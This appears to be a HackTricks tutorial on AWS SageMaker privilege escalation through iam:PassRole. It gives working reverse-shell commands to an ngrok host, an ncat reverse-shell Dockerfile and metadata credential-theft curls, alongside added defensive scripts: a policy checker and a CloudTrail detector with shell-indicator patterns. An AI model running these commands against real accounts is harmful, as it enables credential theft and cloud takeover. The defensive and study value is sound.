# AWS - Sagemaker Privesc

Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)!

Other ways to support HackTricks:

## `iam:PassRole`, `sagemaker:CreateNotebookInstance`, `sagemaker:CreatePresignedNotebookInstanceUrl`

Start by creating a notebook instance with the IAM role you want to access attached to it:

```bash
aws sagemaker create-notebook-instance --notebook-instance-name example \
--instance-type ml.t2.medium \
--role-arn arn:aws:iam::<account-id>:role/service-role/<role-name>
```

The response should include a `NotebookInstanceArn` field, which contains the ARN of the newly created notebook instance. We can then use the `create-presigned-notebook-instance-url` API to generate a URL that we can use to access the notebook instance once it is ready:

```bash
aws sagemaker create-presigned-notebook-instance-url \
--notebook-instance-name <name>
```

Navigate to the URL and click "Open JupyterLab" in the top right, then scroll down to the "Launcher" tab and, under the "Other" section, click the "Terminal" button.

Now it's possible to access the metadata credentials of the IAM role from that terminal.

**Potential Impact:** Privesc to the sagemaker service role specified.
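The techniques on this page all hinge on one identity being allowed both `iam:PassRole` (unscoped) and a SageMaker action that runs code under the passed role. The following checker is an added example written for this page, not HackTricks code: it walks an IAM identity policy document and flags exactly that combination so a defender can find it before an attacker does. The policy documents and the account ID `111122223333` are constructed samples; the `iam:PassedToService` condition key is a real IAM global condition key.

```python
"""Flag IAM policies that pair iam:PassRole with the SageMaker actions from
this page (notebook instances, presigned URLs, processing/training/tuning
jobs). Added example for the HackTricks page, not HackTricks' own code."""
import fnmatch
import json

# SageMaker actions that accept a role and run attacker-chosen code under it.
SAGEMAKER_ROLE_SINKS = {
    "sagemaker:CreateNotebookInstance",
    "sagemaker:CreateProcessingJob",
    "sagemaker:CreateTrainingJob",
    "sagemaker:CreateHyperParameterTuningJob",
}
# Gives a shell on an existing notebook (no PassRole needed), worth listing too.
SAGEMAKER_URL_ACTIONS = {"sagemaker:CreatePresignedNotebookInstanceUrl"}


def _as_list(value):
    if value is None:
        return []
    return value if isinstance(value, list) else [value]


def _matches(patterns, action):
    """IAM action matching is case-insensitive and supports '*' and '?'."""
    return any(fnmatch.fnmatchcase(action.lower(), p.lower()) for p in patterns)


def _passrole_conditioned(stmt):
    """True if the statement restricts PassRole with iam:PassedToService."""
    cond = stmt.get("Condition", {})
    for op in ("StringEquals", "StringLike", "StringEqualsIfExists", "StringLikeIfExists"):
        if "iam:passedtoservice" in {k.lower() for k in cond.get(op, {})}:
            return True
    return False


def analyze_policy(policy):
    """Return findings for one identity policy (dict or JSON string).

    'passrole-unscoped': Allow iam:PassRole on a wildcard Resource without a
                         iam:PassedToService condition.
    'sagemaker-sink'   : an allowed SageMaker action that runs code under a role.
    'privesc-path'     : both present in the same policy (the page's scenario).
    """
    doc = json.loads(policy) if isinstance(policy, str) else policy
    findings, passrole_unscoped, sinks = [], False, set()
    for idx, stmt in enumerate(_as_list(doc.get("Statement"))):
        if stmt.get("Effect") != "Allow":
            continue
        actions = _as_list(stmt.get("Action"))
        resources = _as_list(stmt.get("Resource"))
        if _matches(actions, "iam:PassRole"):
            # Heuristic: '*' or any trailing wildcard counts as unscoped.
            wildcard = any(r == "*" or r.endswith("*") for r in resources)
            if wildcard and not _passrole_conditioned(stmt):
                passrole_unscoped = True
                findings.append({"type": "passrole-unscoped", "statement": idx,
                                 "resources": resources})
        for sink in SAGEMAKER_ROLE_SINKS | SAGEMAKER_URL_ACTIONS:
            if _matches(actions, sink):
                sinks.add(sink)
                findings.append({"type": "sagemaker-sink", "statement": idx,
                                 "action": sink})
    if passrole_unscoped and sinks & SAGEMAKER_ROLE_SINKS:
        findings.append({"type": "privesc-path",
                         "sinks": sorted(sinks & SAGEMAKER_ROLE_SINKS)})
    return findings


# Constructed sample: the over-permissive shape this page exploits.
WEAK_POLICY = {"Version": "2012-10-17", "Statement": [
    {"Effect": "Allow", "Action": ["sagemaker:*"], "Resource": "*"},
    {"Effect": "Allow", "Action": "iam:PassRole", "Resource": "*"},
]}

# Constructed sample: PassRole pinned to one role and to the SageMaker service.
HARDENED_POLICY = {"Version": "2012-10-17", "Statement": [
    {"Effect": "Allow", "Action": ["sagemaker:CreateTrainingJob"], "Resource": "*"},
    {"Effect": "Allow", "Action": "iam:PassRole",
     "Resource": "arn:aws:iam::111122223333:role/SageMakerTrainingRole",
     "Condition": {"StringEquals": {"iam:PassedToService": "sagemaker.amazonaws.com"}}},
]}

if __name__ == "__main__":
    for name, pol in (("weak", WEAK_POLICY), ("hardened", HARDENED_POLICY)):
        print(name, json.dumps(analyze_policy(pol), indent=1))
```

The hardened policy still lets the principal pass a role to SageMaker, which is often a legitimate need; the difference is that the passable role is named explicitly, so the blast radius is the permissions of that one role rather than any role in the account.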

## `sagemaker:CreatePresignedNotebookInstanceUrl`

If there are Jupyter notebook instances already running and you can list them with `sagemaker:ListNotebookInstances` (or discover them in any other way), you can generate a URL for them, access them, and steal the credentials as described in the previous technique.

```bash
aws sagemaker create-presigned-notebook-instance-url --notebook-instance-name <name>
```

**Potential Impact:** Privesc to the sagemaker service role attached.

## `sagemaker:CreateProcessingJob`, `iam:PassRole`

An attacker with those permissions can get sagemaker to execute a processing job with a sagemaker role attached to it. The attacker can supply the definition of the container that is going to be run on an AWS-managed ECS instance, and steal the credentials of the IAM role attached.

```bash
# I uploaded a python docker image to the ECR
aws sagemaker create-processing-job \
--processing-job-name privescjob \
--processing-resources '{"ClusterConfig": {"InstanceCount": 1,"InstanceType": "ml.t3.medium","VolumeSizeInGB": 50}}' \
--app-specification "{\"ImageUri\":\"<id>.dkr.ecr.eu-west-1.amazonaws.com/python\",\"ContainerEntrypoint\":[\"sh\", \"-c\"],\"ContainerArguments\":[\"/bin/bash -c \\\"bash -i >& /dev/tcp/5.tcp.eu.ngrok.io/14920 0>&1\\\"\"]}" \
--role-arn <sagemaker-arn-role>

# In my tests it took 10min to receive the shell
curl "http://169.254.170.2$AWS_CONTAINER_CREDENTIALS_RELATIVE_URI" #To get the creds
```

**Potential Impact:** Privesc to the sagemaker service role specified.

## `sagemaker:CreateTrainingJob`, `iam:PassRole`

An attacker with those permissions will be able to create a training job, running an arbitrary container on it with a role attached. Therefore, the attacker will be able to steal the credentials of that role.

This scenario is more difficult to exploit than the previous one because you need to build a Docker image that sends the rev shell or the credentials directly to the attacker (you cannot specify a start command in the configuration of the training job).

```bash
# Create docker image
mkdir /tmp/rev
## Note that the training job is going to call an executable called "train"
## That's why I'm putting the rev shell in /bin/train
## Set the values of <YOUR-IP-OR-DOMAIN> and <YOUR-PORT>
cat > /tmp/rev/Dockerfile <<EOF
FROM ubuntu
RUN apt update && apt install -y ncat curl
RUN printf '#!/bin/bash\nncat <YOUR-IP-OR-DOMAIN> <YOUR-PORT> -e /bin/sh' > /bin/train
RUN chmod +x /bin/train
CMD ncat <YOUR-IP-OR-DOMAIN> <YOUR-PORT> -e /bin/sh
EOF

cd /tmp/rev
sudo docker build . -t reverseshell

# Upload it to ECR
sudo docker login -u AWS -p $(aws ecr get-login-password --region <region>) <id>.dkr.ecr.<region>.amazonaws.com/<repo>
sudo docker tag reverseshell:latest <account_id>.dkr.ecr.<region>.amazonaws.com/reverseshell:latest
sudo docker push <account_id>.dkr.ecr.<region>.amazonaws.com/reverseshell:latest
```

```bash
# Create training job with the docker image created
aws sagemaker create-training-job \
--training-job-name privescjob \
--resource-config '{"InstanceCount": 1,"InstanceType": "ml.m4.4xlarge","VolumeSizeInGB": 50}' \
--algorithm-specification '{"TrainingImage":"<account_id>.dkr.ecr.<region>.amazonaws.com/reverseshell", "TrainingInputMode": "Pipe"}' \
--role-arn <sagemaker-arn-role> \
--output-data-config '{"S3OutputPath": "s3://<bucket>"}' \
--stopping-condition '{"MaxRuntimeInSeconds": 600}'

# To get the creds
curl "http://169.254.170.2$AWS_CONTAINER_CREDENTIALS_RELATIVE_URI"
```

Creds env var value example: `/v2/credentials/proxy-f00b92a68b7de043f800bd0cca4d3f84517a19c52b3dd1a54a37c1eca040af38-customer`

**Potential Impact:** Privesc to the sagemaker service role specified.
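Both the processing-job and the training-job paths above leave a `CreateProcessingJob` / `CreateTrainingJob` record in CloudTrail that carries the container definition. The scanner below is an added example written for this page (not HackTricks code) that reads such records and flags the two tells visible in the commands above: a processing job whose entrypoint or arguments look like an interactive shell rather than a data-processing step, and a training or tuning job whose image comes from a registry outside an allowlist. The CloudTrail records are constructed samples, the attacker host `attacker.example` and the account IDs are placeholders, and the camelCase field names (`appSpecification.containerArguments`, `algorithmSpecification.trainingImage`, `trainingJobDefinition`) are assumed to follow CloudTrail's usual rendering of the API request parameters; check them against your own trail before deploying.

```python
"""Detect SageMaker job creations that look like the privesc paths on this
page, from CloudTrail records. Added example, not HackTricks' own code."""
import re

# Indicators derived from the commands shown on this page, plus close variants.
SHELL_PATTERNS = [
    re.compile(r"/dev/tcp/"),                          # bash network redirection
    re.compile(r"\bbash\s+-i\b"),                      # interactive bash
    re.compile(r"\b(nc|ncat|netcat)\b.*\s-e\b"),       # ncat ... -e /bin/sh
    re.compile(r"\b(curl|wget)\b.*169\.254\.170\.2"),  # container creds endpoint
]

# Constructed allowlist: a hypothetical in-house ECR prefix. A real deployment
# would add the AWS-owned SageMaker image accounts for its region.
TRUSTED_IMAGE_PREFIXES = (
    "111122223333.dkr.ecr.eu-west-1.amazonaws.com/ml-approved/",
)


def _text(value):
    """Flatten an entrypoint/argument list into one searchable string."""
    if value is None:
        return ""
    return " ".join(str(v) for v in value) if isinstance(value, list) else str(value)


def inspect_event(event):
    """Return a finding dict for one CloudTrail record, or None if benign."""
    if event.get("eventSource") != "sagemaker.amazonaws.com":
        return None
    name = event.get("eventName")
    params = event.get("requestParameters") or {}
    actor = (event.get("userIdentity") or {}).get("arn", "unknown")
    base = {"eventName": name, "actor": actor, "roleArn": params.get("roleArn")}

    if name == "CreateProcessingJob":
        spec = params.get("appSpecification") or {}
        cmd = _text(spec.get("containerEntrypoint")) + " " + _text(spec.get("containerArguments"))
        hits = [p.pattern for p in SHELL_PATTERNS if p.search(cmd)]
        if hits:
            return {**base, "reason": "shell-like container command",
                    "indicators": hits, "image": spec.get("imageUri")}
        image = spec.get("imageUri", "")
    elif name == "CreateTrainingJob":
        image = (params.get("algorithmSpecification") or {}).get("trainingImage", "")
    elif name == "CreateHyperParameterTuningJob":
        tjd = params.get("trainingJobDefinition") or {}
        image = (tjd.get("algorithmSpecification") or {}).get("trainingImage", "")
    else:
        return None
    if image and not image.startswith(TRUSTED_IMAGE_PREFIXES):
        return {**base, "reason": "image outside trusted registries", "image": image}
    return None


def scan(records):
    """Run inspect_event over an iterable of CloudTrail records."""
    return [f for f in (inspect_event(r) for r in records) if f]


# Constructed sample records (field names are an assumption, see lead-in).
SAMPLE_EVENTS = [
    {"eventSource": "sagemaker.amazonaws.com", "eventName": "CreateProcessingJob",
     "userIdentity": {"arn": "arn:aws:iam::111122223333:user/dev"},
     "requestParameters": {
         "processingJobName": "privescjob",
         "roleArn": "arn:aws:iam::111122223333:role/SageMakerRole",
         "appSpecification": {
             "imageUri": "111122223333.dkr.ecr.eu-west-1.amazonaws.com/python",
             "containerEntrypoint": ["sh", "-c"],
             "containerArguments": ['/bin/bash -c "bash -i >& /dev/tcp/attacker.example/4444 0>&1"']}}},
    {"eventSource": "sagemaker.amazonaws.com", "eventName": "CreateTrainingJob",
     "userIdentity": {"arn": "arn:aws:iam::111122223333:user/dev"},
     "requestParameters": {
         "trainingJobName": "privescjob",
         "roleArn": "arn:aws:iam::111122223333:role/SageMakerRole",
         "algorithmSpecification": {
             "trainingImage": "999999999999.dkr.ecr.eu-west-1.amazonaws.com/reverseshell",
             "trainingInputMode": "Pipe"}}},
    {"eventSource": "sagemaker.amazonaws.com", "eventName": "CreateTrainingJob",
     "userIdentity": {"arn": "arn:aws:iam::111122223333:role/CI"},
     "requestParameters": {
         "trainingJobName": "nightly-model",
         "roleArn": "arn:aws:iam::111122223333:role/SageMakerRole",
         "algorithmSpecification": {
             "trainingImage": "111122223333.dkr.ecr.eu-west-1.amazonaws.com/ml-approved/xgb:1.0",
             "trainingInputMode": "File"}}},
]

if __name__ == "__main__":
    for finding in scan(SAMPLE_EVENTS):
        print(finding)
```

The image allowlist is the more robust of the two checks: the training-job path gives the attacker no entrypoint to inspect, so the only thing the control plane sees is which image was pulled and which role was passed, which is exactly what the second rule keys on.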

## `sagemaker:CreateHyperParameterTuningJob`, `iam:PassRole`

An attacker with those permissions will (potentially) be able to create a **hyperparameter tuning job**, **running an arbitrary container** on it with a **role attached**.\
_I haven't exploited it because of lack of time, but it looks like the previous exploits; feel free to send a PR with the exploitation details._

# References
* [https://rhinosecuritylabs.com/aws/aws-privilege-escalation-methods-mitigation-part-2/](https://rhinosecuritylabs.com/aws/aws-privilege-escalation-methods-mitigation-part-2/)
